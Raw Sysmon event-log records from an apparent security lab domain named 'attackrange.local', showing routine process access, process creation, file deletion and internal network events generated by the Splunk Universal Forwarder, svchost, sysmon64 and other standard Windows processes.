Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05AFC29DAAB47B1A8CE3BF0C1E996674,SHA256=D1BF4F2CD38F79CADBEA34B98B712FA5696AAD8FD59E93324463E256BC37A09D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809232Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D6-60EB-B579-00000000D001}3468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809231Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809230Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809229Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809228Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809227Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809226Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809225Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809224Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809223Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809222Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F6D6-60EB-B579-00000000D001}3468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809221Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D6-60EB-B579-00000000D001}3468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809220Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.407{0C1E0330-F6D6-60EB-B579-00000000D001}3468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809263Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.938{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB482185CBB5B4761A25ED359E41E379,SHA256=45A4F00CE33E1A6936C7F14E3C7D82678A4E0553231D50DC194262115216B8B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:18.700{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51159-false10.0.1.12-8000- 23542300x80000000000000001052392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:27.285{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E7A64BDE8D93B0082DE1556CA3964E9,SHA256=DB4A9DD608BD992C6C693289579E0FF45AD937F823CAA0FAFEC70DE7CF614142,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809262Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.797{0C1E0330-F6D7-60EB-B779-00000000D001}31803236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809261Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D7-60EB-B779-00000000D001}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809260Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809259Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809258Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809257Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809256Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809255Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809254Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809253Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809252Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809251Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F6D7-60EB-B779-00000000D001}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 